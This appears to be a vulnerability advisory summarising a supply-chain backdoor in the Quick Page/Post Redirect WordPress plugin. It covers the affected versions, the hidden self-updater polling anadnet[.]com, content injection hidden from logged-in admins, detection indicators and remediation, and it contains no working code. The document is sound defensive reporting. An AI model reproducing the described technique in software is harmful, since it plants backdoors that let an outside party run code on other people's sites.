Full Report
The Quick Page/Post Redirect plugin, installed on more than 70,000 WordPress sites, had a backdoor added five years ago that allows injecting arbitrary code into users' sites. [...]
Analysis Summary
# Vulnerability: Supply Chain Backdoor in Quick Page/Post Redirect Plugin
## CVE Details
- **CVE ID:** Pending (Not explicitly assigned in the report)
- **CVSS Score:** Estimated 9.8 (Critical)
- **CWE:** CWE-506 (Embedded Malicious Code), CWE-494 (Download of Code Without Integrity Check)
## Affected Systems
- **Products:** Quick Page/Post Redirect (WordPress Plugin)
- **Versions:**
- **5.2.1 and 5.2.2:** Contained a malicious self-updater pointing to a non-WordPress.org server.
- **5.2.3 (Tampered Build):** Specifically the version distributed via `w[.]anadnet[.]com` which contains the passive backdoor.
- **Configurations:** Any WordPress site where these specific versions were installed or updated during the 2021 window.
## Vulnerability Description
Between 2020 and 2021, the plugin included a hidden self-update mechanism that bypassed official WordPress.org repositories. This mechanism polled a third-party domain (`anadnet[.]com`) for updates. In March 2021, this external server pushed a tampered version (5.2.3) containing a passive backdoor.
The backdoor hooks into `the_content` and fetches data from the attacker’s server to inject content—primarily used for "parasite SEO" spam. To avoid detection by administrators, the malicious code only executes for logged-out users. Furthermore, the persistent self-update mechanism allows the domain controller to push arbitrary PHP code to any site running the infected versions.
## Exploitation
- **Status:** Exploited in the wild (dormant but persistent on ~70,000 sites).
- **Complexity:** Low (for the attacker controlling the C2 domain).
- **Attack Vector:** Network (Supply Chain / Remote Command and Control).
## Impact
- **Confidentiality:** Low (SEO spam/content injection).
- **Integrity:** High (Arbitrary code execution and site content modification).
- **Availability:** Low (Primary goal appears to be persistence rather than disruption).
## Remediation
### Patches
- **Version 5.2.4:** A clean version was previously released on WordPress.org (Note: The plugin was temporarily pulled from the directory pending review as of the report date). Users should ensure they are on a version sourced directly from WordPress.org.
### Workarounds
- **Uninstall:** Entirely remove the plugin from the WordPress installation.
- **Firewall:** Block all outbound requests from the web server to `anadnet[.]com` and its subdomains.
## Detection
- **Indicators of Compromise:**
- Outbound connections to `anadnet[.]com` or `w[.]anadnet[.]com`.
- Plugin files containing code that hooks into `the_content` with external `curl` or `file_get_contents` calls to unknown domains.
- Discrepancy in file hashes compared to the official WordPress SVN repository for version 5.2.3.
- **Detection methods and tools:**
- Security scanners like Wordfence or Sucuri may flag the unauthorized update mechanism.
- Manual inspection of the plugin's `quick-page-post-redirect.php` for unexpected remote update logic.
## References
- **Vendor Advisory:** Plugin currently pulled from hxxps[://]wordpress[.]org/plugins/quick-pagepost-redirect-plugin/
- **Researcher Report:** hxxps[://]anchor[.]host/the-plugin-author-was-the-supply-chain-attacker/
- **News Source:** hxxps[://]www[.]bleepingcomputer[.]com/news/security/popular-wordpress-redirect-plugin-hid-dormant-backdoor-for-years/